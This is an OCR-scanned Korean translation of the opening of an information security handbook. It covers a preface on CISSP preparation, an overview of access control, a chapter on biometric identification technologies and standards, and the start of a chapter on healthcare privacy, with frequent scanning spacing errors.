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머 리 ■ 


기술은 말그대로 놀라운 속도로 발전하고 있다. 그에 따라 정보보안관리를 담당한 
전문가들앞에는 여러가지 난문제들이 매일 매 시각 제기되고 있다. 그러므로 우리는 장 
별로 새로운 경향，새로운 개념，보안방법론들이 제시되여 있는《정보보안관리편람》제 
4판 3권을 내놓게 된다. 우리 는 이 책 이 정 보보안에 관심 이 있는 전문가들의 실천에서 
언제나 쓰일수 있는 최신참고서가 되리라고 믿는다. 

우리 는 또한 정 보보안전문가들에 게 CISSP 시 험 에 응시 하기 위하여 《 정 보보안일 반지 
식》 ( CBK ) 을 이 《 정 보보안관리 편람》의 내 용과 함께 볼것 을 권고한다. 국제 정 보체 계 보 
안인증협회 가 주관하는 CISSP 시험제도와 CBK 토론회는 전 세계적으로 진행될뿐아니 라 그 
요구도 매우 높다. 

이 시험 에 응시 하자면 CBK 에 담겨 져 있는 많은 문제들도 전반적 으로 리해 하고 적 
용해 야 하므로 상당한 노력 이 든다.《정 보보안관리 편람》계 렬의 도서 들은 이 CISSP 자격 
시험 에 응시하려는 사람들에게 가장 중요한 참고서로 인정되고 있다. 이 도서들은 또한 
실지 사업에서 여기에 담겨 진 내용들을 정상적으로 응용하려는 전문가들과 비전문가를 
에게도 쓸모 있을것이다. 

끊임 없 이 증식 되 는 콤퓨터비 루스와 월 를, 공개망규약에 서 보안상의 빈 구석 들을 살 
살이 찾아 내 는 악질적 인 해커 들의 계 속되 는 위 협 으로 말미암아 최 고경 영 자는 기 업재 
산을 보호하려고 책임성을 가지고 최상의 자격들을 갖춘 보안전문가를 부지런히 찾지 
않으면 안되게 된다. 그러므로 CISSP 자격은 그 어느 때보다도 필수적인것으로 된다고 
보아 진다. 

그런 의 미 에서《 정보보안관리편람》의 본관과 후판들의 차례는 CISSP 자격 시 험의 분 
야에 맞게 편성되여 있다. 매 도서들의 매개 장들에서는 넓은 범위의 정보보안분야와 관 
련된 CBK 에서 제기되는 론점들을 다루고 있다. 그러므로 매판에서 100% 새로운 장들을 
담음으로써 이 분야의 발전추세 에 맞게 최 신내 용들을 반영하려 고 하였 다. 이 전 판들과 
반복된 장은 하나도 없다. 
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제 1 편 

접근조종체계와 방법론 


정보는 귀중하며 따라서 그것이 오용되거나 공개되거나 파괴되지 않도륵 하여야 
한다는 인식으로부터 출발하여 각 기관들에서는 그에 대한 접근조종을 실시하여 결심 
채택에 필요한 결정적인 정보들이 그 무결성과 안전성을 잃지 않도록 적극 노력하고 
있 다. 

이 편에 나오는 장, 절들에서는 사용자식별 및 인증，접근조종기법들과 이 기법들의 
적용 그리 고 그 조종에 맞서는 새 로운 공격 방법들에 대 하여 서술하였다. 

생체계측학이 개인들을 식별하고 보증하며 정보에 대한 접근을 조종하기 위한 수법 
으로서 광범위하게 리용되고 있는것은 이 생체계측학적수법들이 사람의 음성，손자리，지 
문 혹은 망막모양새 등과 갈은 개체적특성을 가지고 사람을 식별할수 있는 가능성을 제 
공하기때 문이 다. 생체 계측학적수법들이 나온지는 몇 해 안되지 만 혁 신적으로 새로운 안. 
이 계속 제기되고 있다. 이 중요한 수법들이 가지고 있는 잠재력은 물론 제한성까지 잘 
알아야 이 기술을 정확히 그리고 효과적으로 적용할수 있을것이다. 

환자의 건강정보의 개인성，비밀성，안전성을 보호하는데서만큼 접근조종이 절실히 
필요한 분야는 아마 없을것이다. 북아메리카주를 내놓고 특히 유럽나라들에서는 오래동 
안 인간의 개 인성문제가 상당히 우선시되여 왔다. 최근에 와서 국내소비자들은 자기들의 
개 인자료들이 보호되고 있다는 확고한 담보를 요구해 나서는데 이르게 되였다. 이 요구 
는 그들의 건강정보가 점점 더 퍼지게 되여 심각한 정도로 로출될수 있다는 우려를 반영 
하는것 이 다. 1996년 에 통과된《 건강보험공용 및 책 임 관계법》 (HIPAA: The Health 
Insurance Portability and Accountability Act) 과 1999 년 에 발표된 《 그램 -리취 -블릴리법》 
(Gramm-Leach-Bliley Act) 만 보아도 정부가 국민들의 요구에 매우 조심 스러운 태도를 보 
이고 있었다는 명백한 증거로 된다. 

나쁜 마음으로 해 킹하는자들이 있음으로 하여 정보조종은 크게 뒤흔들리게 되고 정 
보보안은 심각한 위협에 계속 직면하고 있다. 해커들은 대체로 기관들이 구축한 방어체 
계에 조금씩 뚫고 들어 가 못 쓰게 만드는데 그것이 성공한 실례는 너무나도 많다. 이 
편에 서 는 최 근에 법 무성 Web 싸이트를 망신시키 고 여 러 상업싸이 트에 봉사거 부공격 을 가 
했 다고 굉 장히 보도된 해 커 들의 정 교한 공격 도구들에 대 하여 설 명한다. 

사회 공학적 수법 들은 인 간의 심 리 를 리 용하는 방법 으로 설 치 해 놓은 통제 장벽 을 뚫는 
하나의 방법 으로 된 다. 사회공학이라는것 은 비 량심 적 인 사람들이 우회 적 인 경 로를 리용 
하여 남이 구축해 놓은 조종망들을 파괴할수 있는 정 보들을 얻 어 내 는것 을 말한다. 실례 
로 콤퓨터기 술자로 가장한 어 떤자가 불의 에 한 콤퓨터 사용자에 게 전화를 걸 어 망에 서 기 
술적 으로 문제 가 생겨 고쳐 야 하겠으니 당신의 망통과암호를 알려 달라고 해 서 그 암호 
를 가지 고 그 체 계 를 득 해 결 해 치 우는것 을 볼수 있 다. 


12 




제 1 장. 생체계측학에서 새로운 점 


쥬디스 엠 마이어슨 


망세계에서의 안전문제는 오래동안 통과암호나 개인식별번호 ( HN ) 혹은 자기 어머니 
의 애명과 같은 개 인정 보에 의거하여 왔다. 지금 이 런것들은 카드열쇠，스마트카드，토큰 
열쇠 와 함께 생체계 측지표로 보강되 고 있다. 생체계 측학에서는 사람의 손끝，눈，얼굴특 
징들을 계측한다. 사람이 말은 어떻게 하며 열쇠는 어떻게 매만지며 걸음은 어떻게 걷는 
가에 의해서도 계측될수 있다. 앞으로는 사람의 귀가 어떻게 생겼으며 소리를 어떻게 듣 
는가에 대 해 서 도 사람별 로 측정 할수 있 을것 이 다. 

전통적인 생태계측체계를 본 다음 보다 새로운 기술과 체계를 보라. 표준화문제와 
설정기 준만 간단히 토론하면 즉시 새 기 술로 되 는것 이 다. 

지 문 


검 은잉 크판대기 에 시 끄럽 게 손가락을 굴려 지 문을 따고 또 흰종이 에 복사하기 를 며 
칠 하는 지 문채 취작업 은 몇년만 있으면 과거 의 일 로 될 것 이 다. 이제 마음 먹 은대 로 그 
무슨 일이나 다 할수 있는 지문수감기의 시대에 들어 가게 된다. 손가락끝을 지문수감기 
의 수감소편우에 슬쩍 놓으면(재빨리 그리고 깨끗이) 먼 곳에 있는 망체계에 쉽게 접근 
할수 있을것 이 다. 갈은 지문은 없으니 내 지문은 복제 못할것 이 라고 안심을 할수 있을것 
이다. 

지문은 손가락끝에 있는 무늬들의 모임이다. 잘 찍은 지문은 끊긴 선들과 가지 친 선 
들로 되여 있다. 이것을 지문색인에서는 세밀선이라고 한다. 보통 지문 한개에는 40〜60 
개의 세밀선이 있다. 무늬들이 세밀선이 보일 정도로 되여도 수감기들은 손가락끝의 모 
든 세부들을 다 포착 못할수도 있다. 일부 사람들의 손가락무늬들은 타자를 너무 치거나 
힘든 고전곡목들을 피아노연주하여 너무 희미해짐으로써 잘 보이지 않는 경우들도 있다. 
또한 날 때부터 유전적결함이 있거나 사고로 손가락끝에 상처가 있든가 하면 지문읽기가 
매우 힘들것이다. 

이미 보관되여 있는 지문기록과 개 인들의 지문을 대조해 보는 방법에는 4가지 즉 전 
자수감，온도수감，광학수감，혼성수감이 있다. 전자수감에서는 지문의 마루와 골짜기사이 
의 전자기마당세 기 의 변화를 측정한다. 온도수감에 서는 손가락누름새 즉 수감부표면을 
지 나갈 때 손가락끝표면의 마루들이 마찰로 하여 비접 촉골보다 더 열을 발산하는 특성으 
로부터 생 기는 온도차를 측정한다. 광학수감에서는 지 문의 파장차이를 측정한다. 혼성수 
감에 서는 광학수감과 전자수감을 혼성하는 방법 을 리용한다. 
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눈알 스캔 


지문에서와는 달리 사람의 눈에는 그 구조상 세밀선들이 수천개나 된다. 지문세밀선 
들은 지문의 외적구조의 무늬 밖에 보여 주지 못하지만 사람의 눈에 있는 세밀선들은 눈 
알의 내적구조의 무늬까지 보여 준다. 이러한 눈정보는 두가지 즉 망막스캔체계와 홍채 
스캔체계로 얻을수 있다. 망막스캔은 망막에 있는 정맥분포형 태를 포착할수 있다면 홍채 
스캔으로는 홍채의 섬유와 조직，고리형태들을 엄어 낸다. 

망막스캐너는 세기가 낮은 광원을 광학결합기에서 발산하여 해당 인원의 고유한 망 
막형태를 얻어 낸다. 이러한 스캐너를 리용하자면 사람이 시창구를 들여다 보면서 동시 
에 눈이 일정한 곳에 초점을 맞추어야 하는데 이렇게 되면 시력교정렌즈인 접안렌즈를 
끼고 있는 사람들이나 어떤 기구와 접촉하면 불안해 하는 사람들의 경우 스캔효과가 과 
연 정확하게 나오겠는가 하는 문제가 제기된다. 

홍채스캐너는 보통 TV 카메라 같은 기구를 쓰므로 가깝게 접촉하지 않아도 된다. 홍 
채측정 값들은 접 안렌 즈나 안경 같은것 을 끼 고 있 어 도 조명 도만 좋으면 일 없 다. 

병이나 외상으로 인하여 시간이 지나면 눈정보가 달라 질수 있다는것도 알아야 한다. 
눈알스캔은 맹인들에게 필요 없다. 또한 시력장애가 있는 사람들 특히 망막이 손상된 사 
탐도 쓸 필요가 없다. 


얼굴인식 


얼굴인식체계를 리용하면 TV 방영，건물이 나 거 리를 감시 하는 유선카메 라에 비 치는 
사람들의 얼굴들을 자동적 으로 인식할수 있다. 하나의 새 로운 어떤 체 계 에서 는 어둠속에 
서 가동하면서 대 상인물의 얼 굴에 서 나오는 적 외 선열 을 추적하여 현시하기 도 한다. 도박 
산업 에서는 오래전부터 얼굴인식체계망을 독점 적 으로 리 용하여 사기군들의 얼굴을 자료 
기지화해 놓음으로써 보안경찰이 인차 잡아 낼수 있게 하고 있다. 

만일 모양이 완전히 달라 졌을 경 우 례하면 코수염 을 길 렀든가 아니 면 괴 상한 표정 
을 짓고 있다든가 하는 경우에는 얼굴인식체계에 혼란이 조성될수 있다. 또한 카메라와 
해당 인물의 얼굴각도가 완전히 달라 져도 체계에 혼란이 일어 나게 된다. 자료기지에 
입 력된 영상과 문제의 영 상사이의 위 치차가 15ᄋ 만 되 여도 부정 적판별 이 나오게 된다. 
따라서 45 ° 의 차이에서는 인식이 불가능해 진다. 

손과 음성 


손의 기 하학적생 김새 를 기 록해 두는것 은 옛 날부터 감옥에서 많이 씨 왔다. 말하자 
면 손가락들의 길이，너비，굵기와 곡선생김새와 정맥 등 기타 특징들을 비롯하여 손 
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의 3차원적특성 들을 리용한다는것 이 다. 이 때 부은 부위 나 유전적변형 도 놓치 지 말아 
야 한다. 

음성정보기록을 유럽에서는 전화리용에서 많이 쓴다. 겨울에는 손이 시려 장갑을 
끼 기 때 문에 전화 거 는 사람들의 손기 록보다 음성정 보가 더 편 리하다. 사고나 병，년로 
로 하여 목소리가 나쁜것은 물론 주변소음준위가 높을 때에는 음성검증이 상당히 곤 
난 하다. 


새로운 점은 무엇인가 


최근에 생체계측학적수법들은 감옥면회 자검증체 계에서 리용되여 신원을 가장한 
면회 자를 잡아 내 는데 그리 고 리득금지불체 계 에서 사기 적 인 청 구자들을 방지하는데 
도 사용되여 왔다. 생태계측체계가 구축된것은 또한 화물자동차운전수들이 여러개의 
운전면허증을 해가지고 국경이나 주경계선을 넘을 때고쳐 써가지고 다니는것을 막 
자는데도 목적이 있다. 새로운 국경통과체계에서는 지정된 생체계측장소들에서 입국 
하고 출국하는 려행자들을 감시하고 있다. 선거에서는 생체계측학적체계를 리용하여 
투표자의 신원을 확인함으로써 대리투표를 막는데 이 체계는 아직 대중화되지 못하 
고 있다. 

그렇다면 무엇이 새로운 점인가，특히 20()1 년 1월 1일부터 시작된 세번째 천년기에 
들어 와서 말이 다. 현황에 대 한 간단한 개 괄을 위하여 부분적 이 나마 다음의 것 들을 소개 
해 본다. 


• 얼굴，음성과 입술놀림의 결합 

• 착용형 생 체 계 측기 구들 

• ATM (자동현금입출기)에 붙은 지문검출소편 

• 개인인증 

• 기타 


이러한 일부 생체계측학적시도들은 이미 시장실현단계에까지 도달하였으나 일부는 
아직 연구단계 에 있다. 마이크로쏘프트회 사는 자체의 생체계 측연구계 획을 추진시 킴 으로 
써 생체계측학적통합에 강한 추동력으로 부상하고 있다. 

얼굴, 음성 및 입술놀림의 통합 


이 첫 문제는 매우 흥미 있는 문제 이며 특히 독순(입술놀림의 읽기)법이라는 계측법 
은 강한 흥미를 자아낸다. 보다 흥미 있는것은 독순법과 얼굴，음성을 일체적으로 결합시 
키는것이다. 이 체계의 우점은 세가지 구성요소중 하나의 방식이 효과가 낮아도 다른 두 
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가지의 방식이 앞의 낮은 효과를 상쇄，다시 말하여 하나의 방식 이 교란되여도(실례로 
음성에서 나오는 잡음환경) 다른 두 방식들을 리용하여 정확한 식별이 가능하다는것 
이 다. 

이러한 실례는 Dialog Communications Systems (도이 월란드의 에를랑겐)가 개발한것으 
로 알려 진 다중생 체 계 측식 별체 계 (Multimodal Biometric Identification System ) 의 하나인 
BioID 를 들수 있다. 이 체 계 에서는 얼굴，음성，입 술놀림인식 을 다 결합하고 있다. 이 체 
계 는 기록자료들을 읽 어 들이고 매 생체계측특성들을 따로따로 처 리하는것 으로 시 작한다. 
체계의 훈련(자료등록)과정에 생체계측모형들이 매 특성에 한하여 생성된다. 그다음 이 
체계는 이 모형들과 새롭게 기록된 형태를 비교하며 결과값들을 종합하여 사람인식에 리 
용하게 된다. 

이 BioID 체계는 화상흐름에서 나타나는 한 영상의 국부적움직임과 그다음 부분과의 
관계를 보여 주는 벡토르마당값을 계산하는 기법인 빛흐름기법을 리용하여 입술의 놀림 
새 를 포착한다. 이 과정처 리를 위하여 전처 리구간에서 화상흐름의 처음 17개의 영상중에 
서 입술부분을 따낸다. 다음 16개의 벡토르마당에서의 입술놀림새정보를 따내는데 이것 
이 바로 프레 임별 입 술의 운동인것 이 다. 목소리 를 듣지 않고 입 술을 판독하는데 서 제 기 
되 는 하나의 문제 점 은 두세개 의 각이한 단어 들을 발음할 때 같은 입 술움직 임 을 보일 수 
있 다는것 이 다. 

그 회사는 BioID 체 계가 콤퓨터망，인터네트상 거래와 은행 업무체계 그리고 자동현금 
입출기 등 그 어느 기술체계에 대한 접근조종에 다 리용할수 있다고 장담하고 있다. 적 
용분야에 따라 BioID 는 개 인식 별도 할수 있고 검 증도 할수 있게 한다. 식 별방식 에서 는 
이 체계 가 자료기지전체를 검색하여 개체 를 식 별해 주며 검증방식에서는 사람이 자기의 
이름이나 번호를 주면 이 체계가 자료기지의 해당 구역에서 직접 검색하여 생체계측학적 
지표들을 확인하는 식으로 검증해 준다. 

착용형생체계측체계 


오늘날 카메 라와 마이 크는 매 우 작고 가벼 워 얼 굴식 별 과 같은데 쓰이 는 착용형 체계 
와 성과적으로 결합하여 리용되고 있다. 얼굴식별쏘프트웨어보다 훨씬 더 좋은것이 있는 
데 그것 은 자기 의 안경 에 음성발신카메 라를 장착하는것 이 다. 이 기 구를 리용하면 그 누 
구를 보는 순간 이 기구가 귀에 누구라고 속삭여 주므로 그 인물이름을 기억해 낼수 있 
다. 어떤 나라에서는 국경경비대에서 쓸수 있게 이러한 기구들을 많이 시험하였다. 로체 
스터종합대 학 미 래건강쎈터의 연구사들은 이 런 기구들을 알쯔하이머병을 앓는 환자들에 
게 쓸것으로 전망하고 있다. 

예상해 보건대 다음세 대인식체계는 사람들을 보다 쉬 운 환경 에서 실시 간적 으로 인식 
하게 될것 이 다. 실시 간적으로 동작하는 체계들은 세 가지 방식 에 한정되여 동작하는 우에 
서 본 체계들보다 훨씬 효률적이다. 때가 오면 그 체계는 두가지이상이 아니라 다만 하 
나의 생체계측항목으로 인물식 별능력을 가지게 될것 이 다. 
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ATM 카드에 달린 지문수감소편 


대부분의 중요은행들은 카드를 도난 당하였을 때 제기되는 신원협잡을 막기 위해 
ATM 기계 에 생체계 측을 도입 하기 위한 시 험을 꾸준히 진행하여 왔다. 그 한 실례는 
ATM 에 지 문수감소편을 장치하는것 이 다. 일부 회 사들은 ATM 카드에 생체계 측장치 와 함 
께 PKI (공개열쇠 기반)를 적 용할것 을 예 견하고 있다. PKI 는 사용자식 별과 인증에 공개열 
쇠 암호화를 리용하는것 이 다. 비밀열쇠는 ATM 카드에 보관되 고 생체계측지표에 의하여 보 
충되 게 된다. 공개열쇠 기반이 수학적 으로 볼 때 안정 성 이 더 크지 만 그 기 본약점 은 사용 
자의 비밀열쇠의 비밀성을 보장해야 하는것이다. 안전하자면 비밀열쇠는 반드시 손상됨 
이 없이 보호되여야 하는것이다. 방도로는 비밀열쇠를 스마트카드에 넣고 그것을 하나의 
생체계측지 표로 보호잠금해 놓는것 이 다. 

20()1 년 1 월 18일 Keyware 회사(생체 계측 및 중앙인증방안들을 제공하는 회사)는 
Context Systems 회사와 공동개발에 들어 갔다. Context Systems 회사는 ATM 운영체계에 중 
첩하여 쓸수 있는 생체계 측대면부용 PKI 지 원응용프로그람들과 망안전관련체계를 제공하 
는 회사이다. 이 대면부를 리용하면 현재의 표준인 Pm (개인식별번호)을 쓰지 않고도 권 
한부여와 인증을 할수 있을것이다. 은행에서 쓰는 예금카드에는 지문과 함께 접근카드번 
호와 같은 고유식별자번호 ( UIN )， 은행구좌번호 등 은행기관들이 사용하는 중요정보를 담 
게 된다. 


개 인 인증 


개인인증은 개인용콤퓨터，암호작성 및 해#, 자동차 등에 응용할수 있다. 개인용콤 
퓨터사용에 서 인증체 계 를 응용하는것 은 현재 상당히 보급되 여 있는 반면 에 암호작성 및 
해 독에 는 콤퓨터리용과 함께 가능한껏 응용되 고 있 다. 자동차에 인증체 계 를 응용하는 문 
제는 수감부가 불리한 환경인자들을 이겨 낼수 있는더 좋은 방도들을 찾아 내면 십분 
가능하다. 

개인용콤퓨터작업에 개인인증이 제일 먼저 광범히 응용되였다. 무릎형콤퓨터에는 
지문수감부가 있어 회사망접속을 위한 인증을 해준다. 수감부의 인증을 받아 해당 쏘 
프트웨어 로 접 속개 시，화면 보호기，시 동，파일암호작성 그리 고 망접속까지 할수 있게 
된 다. 

Veridicom 회 사는 무릎형 콤퓨터 와 기 타 휴대 형콤퓨터사용자들이 쓸수 있는 지 문수감 
부가 달린 스마트카드읽기장치를 출품하고 있다. 그 목적 은 자료접근, 콤퓨터체계，수자 
식 인증서 에 쓰는 통과암호를 다 없애 자는것 이 다. 콤퓨터건반이 나 노트형콤퓨터，무선전화， 
인 터네 트관련장치 들에 내 장할수 있는 보다 작고 보다 효과적 인 인증용수감부도 회 사에 서 
제공하고 있다. 

암호작성 및 해독은 무릎형콤퓨터사용자들이 많이 관심을 가지는데 소유자의 지문을 
거쳐야만 비밀열쇠를 가지게 되는 잠금통은 매우 주목을 끈다. 콤퓨터소유자는 이 잠금 
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통을 리용하여 개별망과 인터네트로 정보를 암호화하여 보낼수 있다. 이 잠금통에도 수 
자식 인증서들이 나 보다 안전한 통과암호가 있다. 

제작업체들에서는 자동차 특히 승용차에 수감부를 설치하고 있는데 차문을 여는데는 
승용차문손잡이나 열쇠구멍에 있는 수감판을，시동하는데 는 계기판우에 있는 수감판을 
리용하게 되여 있다. 이 업체들은 엄혹한 기후조건이나 내부의 고온상태에서도 정확히 
동작할수 있는 능력 등 수감부소편의 신뢰도향상에 주력하고 있다. 연구중에 있는 또 하 
나의 문제는 높은 준위의 정전기 방출을 이겨 내는 능력 이 다. 

기타 새로운것들 


기타 새로운 문제들에는 려행자지문적용，공공신분증카드，공안감시체계 등이 있다. 
려행자지문적용이라는것은 여러 곳을 비행기편이나 철도，배편으로 자주 다니는 사람들 
이 비행장이나 국경에서 지문체계에 참가하게 하는것을 말한다. 이런 려행자들은 지문표 
본하나를 가지고 편리하게 비행기표도 사고 호텔에서 지불도 간단히 할수 있을것이다. 
공공신분증카드는 여러 목적에 리용될수 있는데 여기에는 생체계측학적지표들을 다 넣는 
다. 공안감시 카메 라체 계 는 자동적 으로 얼 굴인식 프로그람의 도움으로 밤낮없 이 범 죄 자추 
적도 할수 있을것이다. 

연구자들은 현재 쓰고 있는 얼굴인식 알고리듬의 일부 제한요소들을 완화시켜 조명도， 
로화，심부회전과 얼굴표정으로 인하여 생기는 변화값들에 보다 더잘 적응해 나가고 있 
다. 또한 이미 부분적인 해결을 본 문제이지만 수염，안경，화장 등에 의한 모습변화에도 
대처해 나갈 방도를 람구하고 있다. 

마이크로쏘프트회사의 노력 

2000년 5월 5일 마이크로쏘프트사는 VO Software 사와 합작하여 원도우즈조작체계에 
생체 계측인증기술을 결합시 키는 작업 에 착수하였다. 마이크로쏘프트사는 VO Software 의 
생 체 계 측 API ( BAPL ) 기술과 SecureSuite 사의 핵심적 인 인증기술을 엄 어 를퓨터사용자들에 
게 개 인인증방법에 기초한 높은 수준의 망보안체계를 제공하려고 한다. 

이러한 기술의 결합으로 사용자들은 자기 콤퓨터에 접속한 다음에는 통과암호대신 
지문，홍채형 태 나 음성 인식과 암호화된 비밀열쇠를 배 합리용하여 전자상업거 래를 안전하 
게 진행하게 될것 이 다. 생체계측모형 을 하나 복제하거 나 모방하는것은 보다 어 렵 다. 그것 
은 두 인물이 가지 고 있는 특징전부가 같을수 없기때 문이 다. 생체계 측학적수법 이 통과암 
호나 스마트카드，개 인식별번호를 대 처하는데 아주 좋다는 점은 생체계측학적자료들이 
망각，분실，도난 및 공유의 위험이 없기때문이다. 
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표준화 문 제 


생체 인식체 계와 관련된 산업은 150 개 이 상의 각이 한 하드웨 어 및 쏘프트웨 어 업체들을 
망라하고 있으며 이 업체들은 계마끔 자기전용대면부와 알고리듬，자료구조를 가지고 있다. 
현재 공통의 쏘프트웨어대면부를 제공하고 생체계측모형을 공유하며 결국에는 서로 다른 
생체계측기술을 원만히 비 교평 가할수 있게끔 표준화하기 위한 사업 이 진척되 고 있다. 

그 한 실례로 BioAPI 표준을 들수 있는데 여기서는 임의의 생체계측적응용에도 대면 
할수있는 공통의 방법을 규제하고 있다. BioAPI 는 60 여개의 업체와 정부기관들의 공동 
투자로 개 발된 열린체 계 의 표준이 다. C 언어 로 짠 이 표준은 사용자이 름등록，신원확인(인 
증) 그리 고 신원발견 등과 갈은 모든 생체계 측기술들에 공통적 으로 존재하는 명 령들을 
수행하는 기 능호출을 다 포괄하고 있 다. 

BioAPI 공동개 발국제 림의 초창자인 마이크로쏘프트는 중도에서 떨어 져 나와 자기고 
유의 BAPI 생 체계 측대 면부표준을 개 발하였 다. 이 표준은 I/O Software 사에 서 마이 크로쏘프 
트사가 구입 했던 BAPI 기술에 기 초한것 이 다. 다른 하나의 잠정 적 인 표준은 각이한 생체계 
측설 비 들에 서 수집 한 모형 (templates) 들을 교환하고 보관할수 있는 공통적 인 수단을 규정 
한 《 생체계 측교환파일공통형식》이 라는 표준이 다. 이 생체 인식체 계국제개발림은 또 
《 공통지 문세 밀 선교환》형 식 에 대 해 서 도 제 안하였 는데 여 기 서 는 지 문기 술관련 업 체 들을 
위 한 일정 한 정 도의 운용호환성 (interoperability) 을 제 공하자는것 이 목적 이 다. 

운용호환성문제외 에 생체계측표준문제 는 생체계 측적 담보 및 시험을 위한 방법론적기 
초를 마련하는 수단이 라고 볼수 있다. 생체계 측적 담보란 생체계 측기구나 설비 가 목적한 
수준의 안전성 을 가지 고 있다는 확신을 의 미한다. 현재 생체계 측지표들을 비 교해 볼수 
있 는 계 측지 표들은 제 한되 여 있 다. 

부분적 인 해 결책 으로 미 국방성 생체계 측관리 실과 기 타 그룹들은 현재 표준적 인 시 험 
방법 론들을 개 발하고 있는중이 다. 이 사업 은 대부분 《 공통기 준안》의 틀거 리안에서 진 
행 하고 있 다. 이 기 준안은 모든 보안관련제 품들의 성 능평 가와 비 교를 표준화하기 위하여 
국제 적 으로 보안관계 기 관들이 공동으로 개 발한 모형 이 다. 


선택기준 


정적，동적 및 결합적 인 생 태인식체계를 선택 하자면 사용자의 실지 감각적 인 체험 자 
료，다른 체계나 자료기지와의 대면부설정의 필요성，환경조건 등 매 요인들의 특성에 의 
존하여 야 한다. 

• 사용상편 리 

• 오유빈도 

• 정확도 

• 원가 
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• 사용자인기 

• 보안요구수준 

• 장기적인 적응성 


오유빈도를 제외한 이상의 요소들의 등급은《중》으로부터 《매우 높음》으로까지 
매길수 있다. 오유빈도항목은 오유발생원인(례하면 머리타박，로화，안경 등)에 대한 간단 
한 묘사를 념두에 둔다. 여기에는 또한 사기군이 《정확한 본인》으로 인증될수도 있는 
(다시 말하여 합법적인 본인이 접근배제 당하는 허위배제에 대칭되는 허위접수) 가능성 
도 포함된다. 


결 론 


우리는 생체인식기술의 시대로 들어 서고 있다. 한때 연구계획용이라고 하던 많은 새 
기술들이 지금은 시장에서 실현되고 있다. 이 기술이 인기를 모으고 있는것은 바로 생체인 
식기술이 통과암호에 비하여 도난 당하거나 망각되거나 소실될 가능성이 거의 없기때문이 
다. 그러나 매 생체인식체계는 다 자체의 결점을 가지고 있어 모든 사람에게 다 잘 맞지 
않을수도 있고 또 모습이 상당히 달라 지는 사람들에게는 적용되지 못할수도 있을것이다. 

얼굴인식，음성인식, 입술놀림인식기술의 일체화는 흥미 있는 문제이지만 여기서 입 
술운동의 고세밀도를 보장하는 문제가 더욱 중요하다. 음성을 듣지 못하는 상태에서 입 
술운동을 읽어 낸다는것이 얼마나 혼돈을 가져 오는가 하는데 대해서는 어떤 사람들은 
잘 모르고 있다. 사실상 두세개의 다른 단어를 같은 입술움직임으로 보고 오독하는 경우 
도 있다. 한때 과학환상소설이나 영화에만 나오던 착용형생체인식체계는 현실로 펼쳐 졌 
다. 수십년전까지만 해도 만화책에서나 보던 그것들이 지금 군사부문이나 보건부문에서 
사용되고 있는 수준이다. 

또한 오늘은 무릎형콤퓨터에 비밀열쇠，수자식인증서，안전한 통과암호를 담은 지문 
안전잠금통을 같이 사용하고 있지만 래일에는 승용차의 문손잡이에 손가락끝만 살짝 대 
도 문이 절컥 열릴것이다. 그러나 이것은 자동차제조업자들이 혹심한 기후조건에도 견덜 
수 있는 수감소편을 구입하기 위하여 노력하지 않으면 불가능할것이다. 

이 모든것들은 표준화문제를 제기하고 있다. 운용호환성과 관련하여 여러 표준안를 
이 제기되여 몇건이 실행되고 있다. 그뒤를 따라 성능시험방법과 관련한 표준안들이 현 
재 연구단계에 있다. 표준화사업 이 보다 성숙되면 우리가 지금껏 보지 못했던 새로운 생 
체계측기술들이 시장에 큼직큼직 발을 들여 놓을것이다. 이런 많은 기술들은 동적으로 
실시 간처 리를 할것 이며 동시 에 보다 상당히 완화된 환경 에서 운용할수 있을것 이 다. 

생체인식기술이 이룩하고 있는 진보에도 불구하고 통과암호는 유전적기형，질병，년 
토나 상처로 하여 계측모형을 얻어 내기 힘든 일부 사람들을 위하여 계속 봉사할것으로 
전망된다. 물론 이것은 오늘에는 가설에 지나지 않는다. 래일에 특히 아직 설계도에도 없 
는 획기적인 기술로 하여 래일에는 그렇지 않을수도 있을것이다. 
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제 2 장. 보건산업에서의 사적비밀 


케이트 보튼 


나의 직업적활동안팎에서 혹은 사람들과의 일상 교제에서 내가 알게 되 
는 모든것，그러나 밖에 알려 지지 말아야 하는것은 비밀을 지킬것이며 
절대로 루설하지 않겠노라 

_《 히 포크라테 스선서 >중에 서- 
《의 학의 아버지》히 포크라테 스， BC 약 400년 


오래전에 의사들은 단독으로 혹은 조수없이 일하였으므로 환자의 병력을 자기 손으 
로 직접 썼다. 사사롭고 너무 상세한 자료는 때로 기록하지 않기도 하였다. 의사들은 자 
기 환자들을 친구나 이웃처럼 알고 있었고 많은 세부들도 알게 되였다. 환자들은 의사에 
게 직접 현금으로 혹은 물건으로 때로는 봉사로 치료비를 지불하였다. 중간다리는 없었 
다. 그래서 히포크라테스의 선서는 환자들에게 있어서 귀중한것이였다. 

그러 나 보건분야의 송달 및 지불체계가 나라의 가장 큰 산업의 하나로 된 오늘에 이 
르는 과정에 많은 중간매개자들이 생겨 났으며 다량처리과정과 를퓨터가 펜，종이，열쇠 
채 운 책 상서 랍을 대 신 하게 되 였 다. 

결국 의료봉사의 송달과 그에 대한 지불에 너무나도 많은 관계자들이 모두 복잡한 
조건과 형식에 따라 끼여 들게 되여 매우 작은 기관들을 제외하고는 모두가 일정한 수준 
의 사무자동화가 없이는 업무를 볼수 없게 되였다. 다음의 씨나리오에서 자료의 흐름과 
정을 생각해 보자. 

한 사람이 건강보험에 들었는데 그 사람이 호흡기계통에 병이 생겼다. 환자가 진료의 
사에게 병을 보이니 엑스선흉부투시를 권고한다. 그래서 가까운 병원에 있는 렌트겐과를 
찾아 가 투시를 한다. 만사가 순조롭게 되면 렌트겐투시결과가 진료의사에게 전송되며 그 
의사는 협의진단끝에 처방전을 씨서 약국에 보낸다. 값을 매번 치를수도 있지만 그 엄청난 
의료비가 자기의 보험에서 자동적으로 지불될수도 있는것이다. 얼마 지나 《급부금설명 
서》를 받아 보니 거기에는 의료봉사 받은 내용이 적혀 있는데 그에 대한 비용은 각각 얼 
마이며 보험에서는 얼마를 지불하였다는것이다. 그러나 그에 대하여 회답을 보낼 필요가 
없으므로 아무런 생각도 없이 그것을 어디에 끼워 놓든지 혹은 집어 버릴수도 있다. 

환자가 의료봉사를 받고 치료비를 직접 지불하는 과정처럼 매 봉사제공자(진료의사， 
렌트겐의사，약제사 등)와 환자사이의 호상관계가 독립적이며 제한적인것이 못되고 최근 
에는 치료관계업무들이 막후에서 복잡하게 얽혀 돌아 가면서 환자정보가 멀리에 널리 퍼 
지게 되는 결과를 초래하는 경우가 많아 졌다. 

보건체계내의 몇가지 호상관계만 보아도 환자정보를 어떤 사람들이 알게 되는가를 
쉽게 알수 있다. 
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• 진료소의사 

• 진료소의사의 조수들 

